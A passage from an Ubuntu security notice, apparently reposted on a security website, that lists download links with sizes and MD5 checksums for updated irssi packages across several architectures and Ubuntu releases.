    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.12-4ubuntu2.1_i386.deb
      Size/MD5:  1081934 e10b000070c7aa5c8b201ce349259b15

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/i/irssi/irssi-dev_0.8.12-4ubuntu2.1_lpia.deb
      Size/MD5:   272182 4867d2069ee6df1cec187acee6320cbc
    http://ports.ubuntu.com/pool/main/i/irssi/irssi_0.8.12-4ubuntu2.1_lpia.deb
      Size/MD5:  1072888 508142c2792655d77e92d0e7e48db726

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/i/irssi/irssi-dev_0.8.12-4ubuntu2.1_powerpc.deb
      Size/MD5:   272214 2999207cc554976f7c2e01f4fc6efd2b
    http://ports.ubuntu.com/pool/main/i/irssi/irssi_0.8.12-4ubuntu2.1_powerpc.deb
      Size/MD5:  1162928 37aca332581976e13afc95f809680839

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/i/irssi/irssi-dev_0.8.12-4ubuntu2.1_sparc.deb
      Size/MD5:   272220 02ef75b4c5eba33d9e7f9cbbe19303f4
    http://ports.ubuntu.com/pool/main/i/irssi/irssi_0.8.12-4ubuntu2.1_sparc.deb
      Size/MD5:  1095538 757143852d8c4c7849a253434629229f

Updated packages for Ubuntu 9.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.12-6ubuntu1.1.diff.gz
      Size/MD5:    20812 eb6aa3d63c1de2418610c745a8c6b6ac
    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.12-6ubuntu1.1.dsc
      Size/MD5:     1390 584470415039a47f1f57d303cff414fa
    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.12.orig.tar.gz
      Size/MD5:  1335967 ddf717a430e1c13a272f528c4f529430

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi-dev_0.8.12-6ubuntu1.1_amd64.deb
      Size/MD5:   272604 336644ea219e446ce2c700e456d84949
    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.12-6ubuntu1.1_amd64.deb
      Size/MD5:  1165418 5814ebb9e1abd39e89ddd9cd288ede11

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi-dev_0.8.12-6ubuntu1.1_i386.deb
      Size/MD5:   272594 80232d032a5edd99ae19aaf68a188c4d
    http://security.ubuntu.com/ubuntu/pool/main/i/irssi/irssi_0.8.12-6ubuntu1.1_i386.deb
      Size/MD5:  1082748 dec0bdac2d1e3a0f62b707403bf2a311

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/i/irssi/irssi-dev_0.8.12-6ubuntu1.1_lpia.deb
      Size/MD5:   272588 b0f1fffb8f42dab0ed8a5c4912e7e1f3
    http://ports.ubuntu.com/pool/main/i/irssi/irssi_0.8.12-6ubuntu1.1_lpia.deb
      Size/MD5:  1073846 e9ea02aebbe847efd09a44467102f2ee

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/i/irssi/irssi-dev_0.8.12-6ubuntu1.1_powerpc.deb
      Size/MD5:   272624 ccbc3a7bf2ffe5f4add29fa255435b92
    http://ports.ubuntu.com/pool/main/i/irssi/irssi_0.8.12-6ubuntu1.1_powerpc.deb
      Size/MD5:  1163624 0dc63456374de3e55d09f040c685dace

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/i/irssi/irssi-dev_0.8.12-6ubuntu1.1_sparc.deb
      Size/MD5:   272610 77de61952372522c3d131e11fa4570f2
    http://ports.ubuntu.com/pool/main/i/irssi/irssi_0.8.12-6ubuntu1.1_sparc.deb
      Size/MD5:  1095928 4b2b8206560970d01b40a197e88d73cb


New User Registration
Email:
UserID:
Passwd:
Please email me your monthly newsletters, informing the latest services, improvements & surveys.
Please email me a vulnerability test announcement whenever a new test is added.
   Privacy
Registered User Login
 
UserID:   
Passwd:  

 Forgot userid or passwd?
Email/Userid:




Home | About Us | Contact Us | Partner Programs | Privacy | Mailing Lists | Abuse
Security Audits | Managed DNS | Network Monitoring | Site Analyzer | Internet Research Reports
Web Probe | Whois

© 1998-2014 E-Soft Inc. All rights reserved.